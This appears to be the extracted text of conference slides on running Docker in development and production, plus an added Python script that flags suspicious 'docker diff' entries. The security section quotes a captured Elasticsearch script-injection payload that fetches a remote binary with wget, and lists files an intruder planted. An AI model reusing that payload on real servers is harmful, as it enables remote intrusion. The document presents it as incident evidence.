@Ben_Hall / Blog.BenHall.me.uk
WHO AM I?
Agenda
doger.io
Container
https://www.docker.com/whatisdocker/
Native CPU
Native Memory
Native IO
No Pre-Allocation
No Performance Overhead
Milliseconds to launch
Still fully isolated
Everything is a container
New Starters
Docker Compose
Node.js
> docker run -it --rm \
-w /usr/app \
-v $(pwd):/usr/app \
-v $(pwd)/d_node_modules:/usr/app/node_modules \
-p 3000:3000 \
node:0.10.38 \
bash
RStudio
> docker run -d -p 8787:8787 rocker/rstudio
['chrome', 'firefox'].forEach(detectBrowser);
https://github.com/BenHall/docker-selenium-example
Building Images
Order Matters
Size Matters
Go Lang Development
Environment
> docker run -it --rm \
-w /go/src/github.com/myapp \
-v $(pwd)/vendor/github.com/:/go/src/github.com/ \
-v $(pwd):/go/src/github.com/myapp \
golang:1.4 \
bash
copy:
	docker create --name tmp warden-dev
	docker cp tmp:/go/bin/app $(shell pwd)/app
	docker rm tmp
build-release:
	docker build -t ocelotuproar/warden .
Private Registry
Like hub.docker.com
Just a container
Docker in Production
Immutable
Disposable Container Pattern
Persisting Data
> docker run -v <host-dir>:<container-dir> image
-v /opt/docker/elasticsearch:/data
-v /opt/docker/mysql:/var/lib/mysql
-v /docker/scrapbook/uploads:/app/public/uploads
-v $(PWD):/host
-v /var/log/syslog:/var/log/syslog
Docker Compose
> docker-compose up -d
> cat docker-compose.yml
web:
  image: ocelotuproar/katacoda
  volumes:
    - /opt/projects/katacoda/data:/usr/src/app/data
    - /opt/docker/katacoda/db:/usr/src/app/ocelite-db
    - /var/run/docker.sock:/var/run/docker.sock
  ports:
    - 3000
  environment:
    VIRTUAL_HOST: 'katacoda.com,*.katacoda.com'
    NODE_ENV: 'production'
  restart: always
Docker Events
Problem: Port 80
Problematic Approach
> docker run -d --name nginx_root \
--link blog_benhall-1:blog_benhall-1 \
--link katacoda-1:katacoda-1 \
--link scrapbook_web_1:scrapbook_web_1 \
--link brownbag_web_1:brownbag_web_1 \
-p 80:80 \
-v /opt/docker/nginx/www:/data \
-v /opt/docker/nginx/sites:/etc/nginx/sites-enabled \
-v /opt/docker/nginx/logs:/var/log/nginx \
nginx
Nginx Proxy
https://github.com/jwilder/nginx-proxy
https://www.dropbox.com/s/2f6y2frfjafc409/nginx-proxy-optimised.gif?dl=0
-v /var/run/docker.sock:/tmp/docker.sock
VIRTUAL_HOST=my.container.com
// Load Balanced
> docker stop <container for myapp:v2.0>
Not Great.
Weave
> weave launch
> docker run --name ws web-server
// second host
> weave launch <host-01 ip>
Weave DNS
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run --name ws -d -p 80:80 \
scrapbook/docker-http-server
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.1)
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.2)
> docker run ubuntu ping -c1 ws
ping ws.weave.local (10.0.0.3)
Nginx
Wordpress
blog_benhall
Nginx
Varnish
Wordpress
blog_benhall_varnish
blog_benhall
Common Question: Is it secure?
org.elasticsearch.search.SearchParseException: [index][3]:
query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse
source
[{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"
script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br
= new BufferedReader(new
InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi
http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"
}}}]]
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d
A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
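Added example, not part of the original slides: the listing above has the A/C prefix format that `docker diff` prints, and the Python below triages such output into leaf-level findings (replaced system binaries, new startup scripts, files dropped in temp directories). The rule names, path patterns and the JVM allowlist entry are assumptions chosen for illustration.

```python
import posixpath
import re

# Constructed sample: lines copied from the listing above ("<A|C|D> <path>").
SAMPLE = """\
C /bin
C /bin/netstat
C /bin/ps
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/rc1.d/S97DbSecuritySpt
A /tmp/gates.lod
A /tmp/hsperfdata_root
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/ps
"""

# Rule names, patterns and the allowlist are assumptions made for this example.
RULES = [
    ("startup-script", "AC", re.compile(r"^/etc/(init\.d|rc[0-6S]\.d)/")),
    ("system-binary-replaced", "CD", re.compile(r"^/(usr/)?s?bin/")),
    ("file-added-to-bin-dir", "A", re.compile(r"^/(usr/)?s?bin/")),
    ("file-dropped-in-tmp", "A", re.compile(r"^/(tmp|var/tmp|dev/shm)/")),
]
ALLOW = re.compile(r"^/tmp/hsperfdata_[^/]+$")  # JVM perf data, normal for Elasticsearch

def parse(text):
    """Yield (kind, path) for well-formed docker-diff lines; skip anything else."""
    for line in text.splitlines():
        kind, _, path = line.strip().partition(" ")
        if kind in ("A", "C", "D") and path.startswith("/"):
            yield kind, posixpath.normpath(path)

def triage(text):
    """Return [(rule, kind, path)] for leaf entries that match a rule."""
    entries = list(parse(text))
    paths = {p for _, p in entries}
    findings = []
    for kind, path in entries:
        # A directory is listed because a child changed; report the child instead.
        if any(p.startswith(path + "/") for p in paths) or ALLOW.match(path):
            continue
        for rule, kinds, pattern in RULES:
            if kind in kinds and pattern.match(path):
                findings.append((rule, kind, path))
                break
    return findings
```

Feed it the text of `docker diff <container>` for a running container; on an image meant to be immutable, any finding outside the declared volumes is worth a look before the container is disposed of.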
--log-opt max-size=50m
--log-opt max-file=100
ELK + LogSpout
> docker run -d \
-p 8000:8000 \
-v /var/run/docker.sock:/tmp/docker.sock \
--name logspout \
gliderlabs/logspout:master syslog://192.168.99.100:5000
https://github.com/benhall/docker-elk
Health Endpoints
Debugging
Scaling
www.katacoda.com
Summary
Batteries included but removable
Thank you!
@Ben_Hall
Ben@BenHall.me.uk
Blog.BenHall.me.uk
www.Katacoda.com